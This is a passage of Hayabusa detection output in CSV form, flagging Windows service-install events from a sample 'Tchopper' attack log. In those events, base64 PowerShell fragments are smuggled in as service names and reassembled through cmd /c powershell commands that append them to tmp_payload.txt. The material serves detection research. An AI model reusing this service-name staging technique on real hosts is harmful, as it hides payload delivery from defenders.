start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c 
powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:34.938 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 